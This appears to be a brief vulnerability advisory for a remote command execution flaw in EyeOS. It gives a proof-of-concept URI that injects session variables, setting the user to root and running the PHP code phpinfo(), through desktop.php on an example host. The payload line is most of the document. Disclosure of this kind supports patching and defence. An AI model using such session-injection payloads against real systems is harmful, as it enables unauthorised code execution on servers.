EyeOS Session Remote Command Execution Vulnerability

EyeOS Session Remote Command Execution Vulnerability

An exploit is not required.

The following proof of concept URI is available:

http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();